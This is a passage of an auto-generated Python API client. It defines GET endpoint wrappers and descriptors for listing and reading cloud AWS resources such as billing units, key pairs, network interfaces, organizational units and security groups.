that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsBillingUnit
If the method is called asynchronously, returns the request
thread.
"""
# Default the transport/validation switches, then delegate to the
# _Endpoint machinery.
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
# The path parameter is received positionally; forward it as a keyword.
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
# Auto-generated endpoint descriptor: binds the GET
# /api/v1/cloud/AwsBillingUnits/{Moid} operation to the private callable
# above ('moid' travels in the URL path).
self.get_cloud_aws_billing_unit_by_moid = _Endpoint(
settings={
'response_type': (CloudAwsBillingUnit,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsBillingUnits/{Moid}',
'operation_id': 'get_cloud_aws_billing_unit_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_billing_unit_by_moid
)
def __get_cloud_aws_billing_unit_list(
self,
**kwargs
):
"""Read a 'cloud.AwsBillingUnit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_aws_billing_unit_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudAwsBillingUnitResponse
If the method is called asynchronously, returns the request
thread.
"""
# List operation: all query parameters arrive in **kwargs; only the
# transport/validation switches need defaulting before delegation.
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
# Auto-generated endpoint descriptor: binds the GET
# /api/v1/cloud/AwsBillingUnits list operation to the private callable
# above; every OData-style parameter is typed and mapped to a query arg.
self.get_cloud_aws_billing_unit_list = _Endpoint(
settings={
'response_type': (CloudAwsBillingUnitResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/AwsBillingUnits',
'operation_id': 'get_cloud_aws_billing_unit_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_aws_billing_unit_list
)
def __get_cloud_aws_key_pair_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsKeyPair' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_key_pair_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsKeyPair. If called asynchronously, returns the request
        thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    # The path parameter travels through kwargs like every other option.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_key_pair_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsKeyPair,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsKeyPairs/{Moid}',
        'operation_id': 'get_cloud_aws_key_pair_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the single path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_key_pair_by_moid
)
def __get_cloud_aws_key_pair_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsKeyPair' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_key_pair_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional] if omitted the server will
            use the default value of ""
        orderby (str): properties used to sort the collection of
            resources. [optional]
        top (int): maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): additional attributes or related resources to
            return alongside the primary resources. [optional]
        apply (str): sequence of OData set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively, to aggregate the resources.
            [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources included with the response. [optional] if
            omitted the server will use the default value of
            "allpages"
        at (str): like "$filter", but applied to versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization for this
            resource: tag keys, usage counts, and assigned values.
            [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsKeyPairResponse. If called asynchronously, returns the
        request thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_key_pair_list = _Endpoint(
    settings={
        'response_type': (CloudAwsKeyPairResponse,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsKeyPairs',
        'operation_id': 'get_cloud_aws_key_pair_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Wire names: OData query options carry a '$' prefix.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every list parameter is sent in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_key_pair_list
)
def __get_cloud_aws_network_interface_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsNetworkInterface' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_network_interface_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsNetworkInterface. If called asynchronously, returns the
        request thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    # The path parameter travels through kwargs like every other option.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_network_interface_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsNetworkInterface,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsNetworkInterfaces/{Moid}',
        'operation_id': 'get_cloud_aws_network_interface_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the single path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_network_interface_by_moid
)
def __get_cloud_aws_network_interface_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsNetworkInterface' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_network_interface_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional] if omitted the server will
            use the default value of ""
        orderby (str): properties used to sort the collection of
            resources. [optional]
        top (int): maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): additional attributes or related resources to
            return alongside the primary resources. [optional]
        apply (str): sequence of OData set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively, to aggregate the resources.
            [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources included with the response. [optional] if
            omitted the server will use the default value of
            "allpages"
        at (str): like "$filter", but applied to versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization for this
            resource: tag keys, usage counts, and assigned values.
            [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsNetworkInterfaceResponse. If called asynchronously,
        returns the request thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_network_interface_list = _Endpoint(
    settings={
        'response_type': (CloudAwsNetworkInterfaceResponse,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsNetworkInterfaces',
        'operation_id': 'get_cloud_aws_network_interface_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Wire names: OData query options carry a '$' prefix.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every list parameter is sent in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_network_interface_list
)
def __get_cloud_aws_organizational_unit_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsOrganizationalUnit' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_organizational_unit_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsOrganizationalUnit. If called asynchronously, returns
        the request thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    # The path parameter travels through kwargs like every other option.
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_organizational_unit_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsOrganizationalUnit,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsOrganizationalUnits/{Moid}',
        'operation_id': 'get_cloud_aws_organizational_unit_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is the wire name of the single path parameter.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_organizational_unit_by_moid
)
def __get_cloud_aws_organizational_unit_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsOrganizationalUnit' resource. # noqa: E501

    Synchronous by default; pass async_req=True to make the request
    asynchronously and receive a thread whose .get() yields the result.
    >>> thread = api.get_cloud_aws_organizational_unit_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter predicate selecting the subset of
            resources to return. [optional] if omitted the server will
            use the default value of ""
        orderby (str): properties used to sort the collection of
            resources. [optional]
        top (int): maximum number of resources to return in the
            response. [optional] if omitted the server will use the
            default value of 100
        skip (int): number of resources to skip in the response.
            [optional] if omitted the server will use the default
            value of 0
        select (str): subset of properties to return. [optional] if
            omitted the server will use the default value of ""
        expand (str): additional attributes or related resources to
            return alongside the primary resources. [optional]
        apply (str): sequence of OData set transformations
            ("aggregate", "groupby"), separated by forward slashes and
            applied consecutively, to aggregate the resources.
            [optional]
        count (bool): return the count of matching resources instead
            of the resources themselves. [optional]
        inlinecount (str): request an inline count of the matching
            resources included with the response. [optional] if
            omitted the server will use the default value of
            "allpages"
        at (str): like "$filter", but applied to versioning
            information properties of the resources. [optional]
        tags (str): request a summary of Tag utilization for this
            resource: tag keys, usage counts, and assigned values.
            [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            response data. Default is True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair of timeouts. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        CloudAwsOrganizationalUnitResponse. If called asynchronously,
        returns the request thread.
    """
    # Fill in the standard call options only where the caller did not
    # supply them explicitly.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
self.get_cloud_aws_organizational_unit_list = _Endpoint(
    settings={
        'response_type': (CloudAwsOrganizationalUnitResponse,),
        # NOTE(review): 'oAuth2' appears twice in the generated spec;
        # preserved verbatim.
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsOrganizationalUnits',
        'operation_id': 'get_cloud_aws_organizational_unit_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [
            'filter', 'orderby', 'top', 'skip', 'select', 'expand',
            'apply', 'count', 'inlinecount', 'at', 'tags',
        ],
        'required': [],
        'nullable': [],
        'enum': ['inlinecount'],
        'validation': []
    },
    root_map={
        'validations': {},
        'allowed_values': {
            ('inlinecount',): {
                "ALLPAGES": "allpages",
                "NONE": "none"
            },
        },
        'openapi_types': {
            'filter': (str,),
            'orderby': (str,),
            'top': (int,),
            'skip': (int,),
            'select': (str,),
            'expand': (str,),
            'apply': (str,),
            'count': (bool,),
            'inlinecount': (str,),
            'at': (str,),
            'tags': (str,),
        },
        # Wire names: OData query options carry a '$' prefix.
        'attribute_map': {
            'filter': '$filter',
            'orderby': '$orderby',
            'top': '$top',
            'skip': '$skip',
            'select': '$select',
            'expand': '$expand',
            'apply': '$apply',
            'count': '$count',
            'inlinecount': '$inlinecount',
            'at': 'at',
            'tags': 'tags',
        },
        # Every list parameter is sent in the query string.
        'location_map': {
            'filter': 'query',
            'orderby': 'query',
            'top': 'query',
            'skip': 'query',
            'select': 'query',
            'expand': 'query',
            'apply': 'query',
            'count': 'query',
            'inlinecount': 'query',
            'at': 'query',
            'tags': 'query',
        },
        'collection_format_map': {}
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_organizational_unit_list
)
def __get_cloud_aws_security_group_by_moid(
    self,
    moid,
    **kwargs
):
    """Read a 'cloud.AwsSecurityGroup' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_security_group_by_moid(moid, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.

    Keyword Args:
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
        _request_timeout (float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute the request asynchronously.

    Returns:
        CloudAwsSecurityGroup, or the request thread when called
        asynchronously.
    """
    # Fill in any transport option the caller did not override.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs[option] = kwargs.get(option, default)
    kwargs['moid'] = moid
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor: GET /api/v1/cloud/AwsSecurityGroups/{Moid}.
# Binds the private request wrapper to the public attribute callers use.
self.get_cloud_aws_security_group_by_moid = _Endpoint(
    settings={
        'response_type': (CloudAwsSecurityGroup,),
        'auth': ['cookieAuth', 'http_signature', 'oAuth2', 'oAuth2'],
        'endpoint_path': '/api/v1/cloud/AwsSecurityGroups/{Moid}',
        'operation_id': 'get_cloud_aws_security_group_by_moid',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['moid'],
        'required': ['moid'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'moid': (str,)},
        # 'Moid' is interpolated into the path template above.
        'attribute_map': {'moid': 'Moid'},
        'location_map': {'moid': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [
            'application/json',
            'text/csv',
            'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_cloud_aws_security_group_by_moid
)
def __get_cloud_aws_security_group_list(
    self,
    **kwargs
):
    """Read a 'cloud.AwsSecurityGroup' resource.

    Synchronous by default; pass async_req=True to run the request
    asynchronously, in which case a thread object is returned.

    >>> thread = api.get_cloud_aws_security_group_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        filter (str): OData $filter expression selecting the entries to
            return. [optional] server default ""
        orderby (str): Properties used to sort the collection.
            [optional]
        top (int): Maximum number of resources to return. [optional]
            server default 100
        skip (int): Number of resources to skip. [optional] server
            default 0
        select (str): Subset of properties to return. [optional] server
            default ""
        expand (str): Additional attributes or related resources to
            include. [optional]
        apply (str): One or more "$apply" set transformations
            (aggregate/groupby), applied consecutively. [optional]
        count (bool): Return the count of matching resources instead of
            the resources themselves. [optional]
        inlinecount (str): Request an inline count of matching resources
            alongside the results. [optional] server default "allpages"
        at (str): Like "$filter", but matches versioning information
            properties. [optional]
        tags (str): Request a summary of Tag utilization for this
            resource. [optional]
        _return_http_data_only (bool): return only the response data,
            without status code and headers. Default True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding. Default True.
